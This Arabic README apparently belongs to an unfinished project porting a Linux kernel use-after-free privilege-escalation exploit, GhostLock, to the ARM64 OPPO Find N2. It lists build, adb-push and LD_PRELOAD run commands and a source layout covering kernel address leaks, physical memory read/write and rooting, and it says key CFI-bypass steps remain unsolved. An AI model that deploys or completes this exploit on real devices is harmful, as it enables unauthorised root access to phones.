
OPPO Find N2 GhostLock (CVE-2026-43499) تكييف استغلال
GhostLock CVE-2026-43499 — بحث رفع صلاحية نواة Linux على OPPO Find N2
GhostLock (CVE-2026-43499) هو ثغرة UAF في مكدس النواة تؤثر على Linux من الإصدار 2.6.39 إلى 7.1-rc1، يتم تشغيلها من خلال حالة سباق FUTEX_CMP_REQUEUE_PI. يقوم هذا المشروع بتكييف استغلال x86_64 من NebuSec/CyberMeowfia إلى OPPO Find N2 (ARM64، نواة 5.10.236).
قيد التطوير — تم التحقق من عدة مراحل exploitation، لكن نقاط العرقلة الأساسية (تجاوز CFI / أوليات الكتابة في النواة) لم تُحل بعد.
FUTEX_CMP_REQUEUE_PI ret=0# 1. استنساخ المستودع
git clone https://github.com/pubglite55/oppo-ghostlock.git
cd oppo-ghostlock
# 2. تعيين مسار NDK
export NDK=/usr/local/Caskroom/android-ndk/29/AndroidNDK14206865.app/Contents/NDK
# 3. تجميع الاستغلال
cd exploit/
make clean && make NDK=$NDK
# 4. الدفع إلى الجهاز
adb push preload.so /data/local/tmp/
# 5. التشغيل
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/ls /dev/null' 2>&1
oppo-ghostlock/
├── exploit/
│ ├── src/
│ │ ├── main.c # المدخل الرئيسي، تشغيل GhostLock
│ │ ├── fops.c # pselect fake lock + kernel base leak
│ │ ├── pipe.c # pipe - قراءة/كتابة فيزيائية
│ │ ├── root.c # رفع صلاحية root
│ │ ├── util.c # دوال مساعدة
│ │ └── kernelsnitch/ # تسريب mm_struct
│ ├── targets/ # تعريف إزاحات الجهاز
│ └── Makefile
└── README.md
هذا المشروع مرخص بموجب MIT License.